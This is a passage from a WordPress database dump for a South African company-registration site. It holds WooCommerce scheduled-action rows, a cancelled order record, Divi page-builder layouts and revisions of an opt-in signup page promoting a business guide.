15:11:23','2019-08-24 13:11:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33231',30,'scheduled-action','',3),(33229,0,'2019-08-24 13:11:03','2019-08-24 13:11:03','{\"webhook_id\":5,\"arg\":1}','woocommerce_deliver_webhook_async','','publish','open','closed','','scheduled-action-5d61377b5cf7b5.04231152-iEIs8qqkJX2HHWxdJMfFWeSMR9yhClO0','','','2019-08-24 15:11:23','2019-08-24 13:11:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33229',0,'scheduled-action','',3),(33230,1,'2019-08-24 15:11:03','2019-08-24 13:11:03','','Order &ndash; August 24, 2019 @ 03:11 PM','','wc-cancelled','open','closed','wc_order_WVwnJXJKodZTL','order-aug-24-2019-0111-pm','','','2019-08-24 15:11:22','2019-08-24 13:11:22','',0,'https://companyregistration.online/?post_type=shop_order&#038;p=33230',0,'shop_order','',1),(33243,0,'2019-08-24 15:32:54','2019-08-24 15:32:54','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6158b17f7e69.78948579-HyHgc1KmQVAkPJI6u4LVTGPEw2SLKpx3','','','2019-08-24 17:33:05','2019-08-24 15:33:05','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33243',0,'scheduled-action','',3),(33242,0,'2019-08-24 15:32:54','2019-08-24 15:32:54','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6158b170d547.78353391-LbVFLXwrILknNz1uFawdr9OpYOtK4kAS','','','2019-08-24 17:33:05','2019-08-24 15:33:05','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33242',0,'scheduled-action','',3),(33244,0,'2019-08-24 16:33:05','2019-08-24 16:33:05','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6166cb0bdbf5.84477602-O3PQ8bSEE5dU1KCFWiznddFRJfFwdQWm','','','2019-08-24 18:33:15','2019-08-24 16:33:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33244',0,'scheduled-action','',3),(33246,0,'2019-08-24 17:33:15','2019-08-24 17:33:15','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d617cbb30be09.10468720-8rDMn1DqASVCys7OIsQwtnaAnerQupR5','','','2019-08-24 20:06:51','2019-08-24 18:06:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33246',1,'scheduled-action','',3),(33248,0,'2019-08-24 19:06:51','2019-08-24 19:06:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d61a3be1faae7.10027107-6EUHs0fQOobI39lhvJ6cduG66F2MTS2R','','','2019-08-24 22:53:18','2019-08-24 20:53:18','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33248',1,'scheduled-action','',3),(33250,0,'2019-08-24 21:53:18','2019-08-24 21:53:18','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d61b398e424e2.13509403-89WmhFkYsZ1v1jW79Rl8YoDjNbKeFKNk','','','2019-08-25 00:00:56','2019-08-24 22:00:56','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33250',0,'scheduled-action','',3),(33252,0,'2019-08-24 23:00:57','2019-08-24 23:00:57','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d61c327b19086.55749861-xCPurL4p1M9dkywbpz177F3xk16BPmuw','','','2019-08-25 01:07:19','2019-08-24 23:07:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33252',0,'scheduled-action','',3),(33254,0,'2019-08-25 00:07:19','2019-08-25 00:07:19','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d61d630090fd2.89670587-fdv3yZLWbSUwlLgwSjwEJoRqNFF9OSzI','','','2019-08-25 02:28:32','2019-08-25 00:28:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33254',1,'scheduled-action','',3),(33256,0,'2019-08-25 01:28:32','2019-08-25 01:28:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d61f1cc6551a0.83756384-Qw7gMdN0K5dlDzy1dnxX9a0W57I44znd','','','2019-08-25 04:26:20','2019-08-25 02:26:20','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33256',1,'scheduled-action','',3),(33258,0,'2019-08-25 03:26:20','2019-08-25 03:26:20','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d620079d004a1.51294201-A7LFXoDF29uxlZO1hULWszWEvUYetuSi','','','2019-08-25 05:28:57','2019-08-25 03:28:57','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33258',0,'scheduled-action','',3),(33260,0,'2019-08-25 04:28:57','2019-08-25 04:28:57','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d620f4f52bc17.52003372-ggcPrwsLpCv5CMqcuk6r4YhyI403PGh4','','','2019-08-25 06:32:15','2019-08-25 04:32:15','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33260',0,'scheduled-action','',3),(33262,0,'2019-08-25 05:32:15','2019-08-25 05:32:15','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d621e0a5cda13.12334675-DGDE85yV1qGo1ICwVJWb8U7Ag0YalcxW','','','2019-08-25 07:35:06','2019-08-25 05:35:06','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33262',0,'scheduled-action','',3),(33264,0,'2019-08-25 06:35:06','2019-08-25 06:35:06','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6231050aa660.16515750-xC3Ecj7bIDe7Xentje2mCVPtRvQ3CYzx','','','2019-08-25 08:56:05','2019-08-25 06:56:05','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33264',1,'scheduled-action','',3),(33266,0,'2019-08-25 07:56:05','2019-08-25 07:56:05','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d623f1befb685.72163370-8TFoHX0d3TtMjl8h9hWgMnzt9WBycpe8','','','2019-08-25 09:56:11','2019-08-25 07:56:11','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33266',0,'scheduled-action','',3),(33268,0,'2019-08-25 08:56:12','2019-08-25 08:56:12','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d624ec84e0c76.63643466-41FS0wkV5vTB312VjCd2HGowup9BpKtk','','','2019-08-25 11:03:04','2019-08-25 09:03:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33268',0,'scheduled-action','',3),(33270,0,'2019-08-25 10:03:04','2019-08-25 10:03:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d625f670d6a64.40193271-W2DCJHuMp64XowsrMnpHPGSMgivdYk1v','','','2019-08-25 12:13:59','2019-08-25 10:13:59','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33270',1,'scheduled-action','',3),(33272,0,'2019-08-25 11:13:59','2019-08-25 11:13:59','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d626fe7d01210.31337086-NOfrU4G62aNF9Q5pmhM8V4gTgwstdTwL','','','2019-08-25 13:24:23','2019-08-25 11:24:23','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33272',1,'scheduled-action','',3),(33274,0,'2019-08-25 12:24:23','2019-08-25 12:24:23','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d627e2d90f5b8.93665211-cypdvU43ppMfk8WuTW03fKv3xYQnocPA','','','2019-08-25 14:25:17','2019-08-25 12:25:17','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33274',1,'scheduled-action','',3),(33276,0,'2019-08-25 13:25:17','2019-08-25 13:25:17','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d628c9aac1ae1.05843998-DxvdS8aOqYTQBlbf5N7gmdigkE9aqPdA','','','2019-08-25 15:26:50','2019-08-25 13:26:50','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33276',0,'scheduled-action','',3),(33278,0,'2019-08-25 14:26:50','2019-08-25 14:26:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d629b03674523.46674999-wJZF1oD6iPDmWzWQWFUaIUPwYUCEtDdS','','','2019-08-25 16:28:19','2019-08-25 14:28:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33278',0,'scheduled-action','',3),(33279,0,'2019-08-25 14:26:50','2019-08-25 14:26:50','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d629b038b6019.83650397-Dhu0QlsmaTekfv6FFEwLUfFGYtHbTP6P','','','2019-08-25 16:28:19','2019-08-25 14:28:19','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33279',0,'scheduled-action','',3),(33281,0,'2019-08-25 15:28:19','2019-08-25 15:28:19','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62ab166e41a1.96437711-VWcSiFWc6SJWsfAywuWhOriO5VJj3abk','','','2019-08-25 17:36:54','2019-08-25 15:36:54','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33281',0,'scheduled-action','',3),(33283,0,'2019-08-25 16:36:54','2019-08-25 16:36:54','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62b9581b9805.54861506-G6EpObHNBkL91WHIY5szeIWoeodEfoZg','','','2019-08-25 18:37:44','2019-08-25 16:37:44','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33283',0,'scheduled-action','',3),(33285,0,'2019-08-25 17:37:44','2019-08-25 17:37:44','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62cc9ea93199.26436739-SZxwEGDQR35CZjXoPzuV8XEUrDZ5Bgsf','','','2019-08-25 19:59:58','2019-08-25 17:59:58','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33285',0,'scheduled-action','',3),(33287,0,'2019-08-25 18:59:58','2019-08-25 18:59:58','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62ec03f31752.10284347-wCxkMtBwneEv2cTX3VCbItJW5LYOSjUd','','','2019-08-25 22:13:55','2019-08-25 20:13:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33287',1,'scheduled-action','',3),(33289,0,'2019-08-25 21:13:56','2019-08-25 21:13:56','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62fad958cc13.96385423-Q7AHM9KWrWZLDP4x47gCrZbRR24tfhpd','','','2019-08-25 23:17:13','2019-08-25 21:17:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33289',1,'scheduled-action','',3),(33291,0,'2019-08-25 22:17:13','2019-08-25 22:17:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6316bb68a846.36179135-Jhe97s1Xryed7PQUgCBMuXGbfA2mmeHs','','','2019-08-26 01:16:11','2019-08-25 23:16:11','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33291',1,'scheduled-action','',3),(33293,0,'2019-08-26 00:16:11','2019-08-26 00:16:11','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6331fc578cf8.25328300-T1WEBI5eGAVhD9H8oankhEuvdiSA0mgX','','','2019-08-26 03:12:28','2019-08-26 01:12:28','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33293',1,'scheduled-action','',3),(33295,0,'2019-08-26 02:12:28','2019-08-26 02:12:28','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6343297d35d5.05271320-5nmsulijG39uzEzNqfPh8U2o1np5PxMP','','','2019-08-26 04:25:45','2019-08-26 02:25:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33295',1,'scheduled-action','',3),(33297,0,'2019-08-26 03:25:45','2019-08-26 03:25:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d635566156c91.29882770-ldJQjKAi0HY33WAY335OEPs8qqa5xvqY','','','2019-08-26 05:43:34','2019-08-26 03:43:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33297',1,'scheduled-action','',3),(33299,0,'2019-08-26 04:43:34','2019-08-26 04:43:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d636cbcf3c551.73987273-g4QLPesR4ddQ0aNLj2nGSDxMHcGYaSUI','','','2019-08-26 07:23:08','2019-08-26 05:23:08','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33299',1,'scheduled-action','',3),(33301,0,'2019-08-26 06:23:09','2019-08-26 06:23:09','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d637ae28d2d16.47838938-93Maj4jN67dFg8gKlyiyQkSU5sHPUJOy','','','2019-08-26 08:23:30','2019-08-26 06:23:30','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33301',0,'scheduled-action','',3),(31746,3,'2019-07-25 12:05:30','2019-07-25 10:05:30','[et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.26.3\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\" template_type=\"module\"][/et_pb_shop]','shop for home','','publish','closed','closed','','shop-for-home','','','2019-07-25 12:05:30','2019-07-25 10:05:30','',0,'https://companyregistration.online/et_pb_layout/shop-for-home/',0,'et_pb_layout','',0),(33312,3,'2019-08-26 10:44:40','2019-08-26 08:44:40','[et_pb_section fb_built=\"1\" _builder_version=\"3.27.3\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"3.27.3\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"2_5\" _builder_version=\"3.27.3\" _i=\"0\" _address=\"0.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/09/Free-Report-cover-CoRegAdwords50off.png\" _builder_version=\"3.27.3\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.27.3\" _i=\"1\" _address=\"0.0.1\"][et_pb_signup title=\"Enter To Win  The Best Business Guide In S.A\" button_text=\"Submit\" description=\"<h5><span>The <span style=%22color: #ffcc00;%22>Book</span> with the inside <span style=%22color: #ffcc00;%22>Scoop</span>.</span></h5>\n<p> </p>\n<h5><span></span><span>This is what most Entrepreneurs didn’t know when they started their businesses.</span></h5>\n\" _builder_version=\"3.27.3\" header_text_color=\"#edf000\" border_radii=\"on|20px|20px|20px|20px\" border_radii_fields=\"on|15px|15px|15px|15px\" hover_enabled=\"0\" _i=\"0\" _address=\"0.0.1.0\" link_option_url=\"#\" custom_button=\"on\" button_bg_color__hover_enabled=\"on|hover\" button_bg_color__hover=\"#edf000\" button_bg_enable_color__hover=\"on\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section]','OptInPage','','inherit','closed','closed','','33306-revision-v1','','','2019-08-26 10:44:40','2019-08-26 08:44:40','',33306,'https://companyregistration.online/33306-revision-v1/',0,'revision','',0),(31752,3,'2019-07-25 12:11:58','2019-07-25 10:11:58','[et_pb_section fb_built=\"1\" _builder_version=\"3.22.3\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#f7f7f7\" background_color_gradient_end=\"#ffffff\" custom_padding=\"21px|0px|36px|0px|false|false\" bottom_divider_style=\"waves2\" bottom_divider_color=\"rgba(0,0,0,0.09)\" bottom_divider_height=\"55px\" bottom_divider_flip=\"vertical\" bottom_divider_arrangement=\"above_content\" template_type=\"section\"][et_pb_row custom_padding=\"0|0px|12px|0px|false|false\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.0.74\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\"]<h1 style=\"text-align: center;\"><span style=\"font-family: inherit; font-weight: normal;\"><strong><span style=\"color: #0c71c3;\">Other Services</span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" custom_padding=\"0px|0px|38px|0px\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" make_fullwidth=\"on\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/maintaning-our-company/\" use_icon=\"on\" font_icon=\"%%173%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"maintaining your company\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"101px|-38px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"200ms\" animation_starting_opacity=\"10%\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/maintaning-our-company/\">Maintaining Your Company</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/bee-requirements/\" use_icon=\"on\" font_icon=\"%%170%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"BEEE Requirements\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/bee-requirements/\">Bee Requirements</a></strong></h3>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb url=\"https://companyregistration.online/product-category/business-tools/\" use_icon=\"on\" font_icon=\"%%176%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Business Tools\" _builder_version=\"3.23.3\" header_font=\"Abel|on||on|\" border_radii=\"on|5px|5px|5px|5px\" transform_scale=\"99%|99%\" transform_translate=\"-102px|2px\" transform_skew=\"3deg|3deg\" custom_padding=\"15px|10px||10px\" animation_style=\"slide\" animation_duration=\"1200ms\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h3 style=\"text-align: center;\"><strong><a href=\"https://companyregistration.online/product-category/business-tools/\">Business Tools</a></strong></h3>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','other services botom','','publish','closed','closed','','other-services-botom','','','2019-07-25 12:11:58','2019-07-25 10:11:58','',0,'https://companyregistration.online/et_pb_layout/other-services-botom/',0,'et_pb_layout','',0),(31756,3,'2019-07-25 12:33:30','2019-07-25 10:33:30','','Money-Back-Guarantee','','inherit','open','closed','','money-back-guarantee','','','2019-07-25 12:33:30','2019-07-25 10:33:30','',0,'https://companyregistration.online/wp-content/uploads/2019/07/Money-Back-Guarantee.png',0,'attachment','image/png',0),(33280,0,'2019-08-25 15:28:19','2019-08-25 15:28:19','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62ab16467786.57575274-o7xqa6hmZzSSdUSfJtjkklWGGq2J33Gk','','','2019-08-25 17:36:54','2019-08-25 15:36:54','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33280',0,'scheduled-action','',3),(33282,0,'2019-08-25 16:36:54','2019-08-25 16:36:54','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62b957dba998.13481971-UU0gfy6fS2sQIAjPz9FbJVpfqzn4MSzG','','','2019-08-25 18:37:43','2019-08-25 16:37:43','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33282',0,'scheduled-action','',3),(33284,0,'2019-08-25 17:37:44','2019-08-25 17:37:44','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62cc9e8b5af3.88132874-fo4daZZxWg84rx4pyR3D62DIeEPHCsWv','','','2019-08-25 19:59:58','2019-08-25 17:59:58','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33284',0,'scheduled-action','',3),(33286,0,'2019-08-25 18:59:58','2019-08-25 18:59:58','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62ec03d4a0c9.60623792-1FDONaJnLVROyJ7C0fHSiyd1dEwrNuvl','','','2019-08-25 22:13:55','2019-08-25 20:13:55','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33286',1,'scheduled-action','',3),(33288,0,'2019-08-25 21:13:55','2019-08-25 21:13:55','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d62fad932eed1.44361876-XIxGTCLzKW0PqZGo7AS9ly4CcW2Umu8j','','','2019-08-25 23:17:13','2019-08-25 21:17:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33288',1,'scheduled-action','',3),(33290,0,'2019-08-25 22:17:13','2019-08-25 22:17:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6316bb597ed7.74783408-yPx8A3T11EF2DdVx9pcVxkKa2ev1Ut0P','','','2019-08-26 01:16:11','2019-08-25 23:16:11','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33290',1,'scheduled-action','',3),(33292,0,'2019-08-26 00:16:11','2019-08-26 00:16:11','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6331fc491437.29059024-szntyCaTKWWcUogdq0XhR8FYiQrRqgWm','','','2019-08-26 03:12:28','2019-08-26 01:12:28','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33292',1,'scheduled-action','',3),(33294,0,'2019-08-26 02:12:28','2019-08-26 02:12:28','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d6343295192a0.69325999-cZXcheSnyy8FdigoqrI3345PVlzyVTd6','','','2019-08-26 04:25:45','2019-08-26 02:25:45','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33294',1,'scheduled-action','',3),(33296,0,'2019-08-26 03:25:45','2019-08-26 03:25:45','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d635566040087.52666271-kfLiXQvDUQCG7dwefyHgSePxHZMAzVhA','','','2019-08-26 05:43:34','2019-08-26 03:43:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33296',1,'scheduled-action','',3),(33298,0,'2019-08-26 04:43:34','2019-08-26 04:43:34','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d636cbcd83668.16283209-NiTdJOabGhhkMqzCuKvQsiW0p0rVqOXK','','','2019-08-26 07:23:08','2019-08-26 05:23:08','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33298',1,'scheduled-action','',3),(33300,0,'2019-08-26 06:23:08','2019-08-26 06:23:08','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d637ae2631fd6.65650930-YcLVurBHtiDWfmkA2kvEgXvxbGgx0Tfa','','','2019-08-26 08:23:30','2019-08-26 06:23:30','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33300',0,'scheduled-action','',3),(33303,0,'2019-08-26 07:23:30','2019-08-26 07:23:30','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d638e1ca27407.00484232-HcY2UJmfPWhHTHfQZscrcmwmz84pEdGr','','','2019-08-26 09:45:32','2019-08-26 07:45:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33303',1,'scheduled-action','',3),(33305,0,'2019-08-26 08:45:32','2019-08-26 08:45:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d639c2ec81f07.86109032-Rjcxcabq7vtiCvmd9hgJ7i001RsZreCr','','','2019-08-26 10:45:34','2019-08-26 08:45:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33305',0,'scheduled-action','',3),(33306,3,'2019-08-26 10:22:00','2019-08-26 08:22:00','[et_pb_section fb_built=\"1\" _builder_version=\"3.27.3\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"2_5,3_5\" _builder_version=\"3.27.3\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"2_5\" _builder_version=\"3.27.3\" _i=\"0\" _address=\"0.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/09/Free-Report-cover-CoRegAdwords50off.png\" _builder_version=\"3.27.3\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"3_5\" _builder_version=\"3.27.3\" _i=\"1\" _address=\"0.0.1\"][et_pb_signup title=\"Enter To Win  The Best Business Guide In S.A\" button_text=\"Submit\" description=\"<h5><span>The <span style=%22color: #ffcc00;%22>Book</span> with the inside <span style=%22color: #ffcc00;%22>Scoop</span>.</span></h5>\n<p> </p>\n<h5><span></span><span>This is what most Entrepreneurs didn’t know when they started their businesses.</span></h5>\n\" _builder_version=\"3.27.3\" header_text_color=\"#edf000\" border_radii=\"on|20px|20px|20px|20px\" border_radii_fields=\"on|15px|15px|15px|15px\" custom_button=\"on\" link_option_url=\"#\" hover_enabled=\"0\" _i=\"0\" _address=\"0.0.1.0\" button_bg_color__hover_enabled=\"on|hover\" button_bg_color__hover=\"#edf000\" button_bg_enable_color__hover=\"on\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section]','OptInPage','','publish','closed','closed','','optinpage','','','2019-08-26 10:50:58','2019-08-26 08:50:58','',0,'https://companyregistration.online/?page_id=33306',0,'page','',0),(33307,3,'2019-08-26 10:20:38','2019-08-26 08:20:38','<!-- wp:divi/placeholder /-->','OptInPage','','inherit','closed','closed','','33306-revision-v1','','','2019-08-26 10:20:38','2019-08-26 08:20:38','',33306,'https://companyregistration.online/33306-revision-v1/',0,'revision','',0),(33308,3,'2019-08-26 10:22:00','2019-08-26 08:22:00','[et_pb_section fb_built=\"1\" _builder_version=\"3.27.3\"][/et_pb_section]','OptInPage','','inherit','closed','closed','','33306-revision-v1','','','2019-08-26 10:22:00','2019-08-26 08:22:00','',33306,'https://companyregistration.online/33306-revision-v1/',0,'revision','',0),(33310,3,'2019-08-26 10:38:23','2019-08-26 08:38:23','[et_pb_section fb_built=\"1\" _builder_version=\"3.27.3\"][et_pb_row _builder_version=\"3.27.3\" column_structure=\"2_5,3_5\"][et_pb_column _builder_version=\"3.27.3\" type=\"2_5\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/09/Free-Report-cover-CoRegAdwords50off.png\" _builder_version=\"3.27.3\" hover_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column _builder_version=\"3.27.3\" type=\"3_5\"][et_pb_signup title=\"Enter To Win  The Best Business Guide In S.A\" description=\"<h5><span>The <span style=%22color: #ff0000;%22>Book</span> with the inside <span style=%22color: #ff0000;%22>Scoop</span>.</span></h5>\n<p>&nbsp;</p>\n<h5><span></span><span>This is what most Entrepreneurs didn’t know when they started their businesses.</span></h5>\n\" _builder_version=\"3.27.3\" hover_enabled=\"0\" header_text_color=\"#edf000\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section]','OptInPage','','inherit','closed','closed','','33306-revision-v1','','','2019-08-26 10:38:23','2019-08-26 08:38:23','',33306,'https://companyregistration.online/33306-revision-v1/',0,'revision','',0),(33302,0,'2019-08-26 07:23:30','2019-08-26 07:23:30','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d638e1c7a54e1.90197800-txjheBKw2u0s4Oh509Ha261gbYU5qnAq','','','2019-08-26 09:45:32','2019-08-26 07:45:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33302',1,'scheduled-action','',3),(33304,0,'2019-08-26 08:45:32','2019-08-26 08:45:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d639c2e7c95f4.65044993-oeKAxJSiuKdyihLgnPfh3FE2HYzdtcEm','','','2019-08-26 10:45:34','2019-08-26 08:45:34','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33304',0,'scheduled-action','',3),(33311,3,'2019-08-26 10:42:47','2019-08-26 08:42:47','[et_pb_section fb_built=\"1\" _builder_version=\"3.27.3\"][et_pb_row _builder_version=\"3.27.3\" column_structure=\"2_5,3_5\"][et_pb_column _builder_version=\"3.27.3\" type=\"2_5\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2016/09/Free-Report-cover-CoRegAdwords50off.png\" _builder_version=\"3.27.3\" 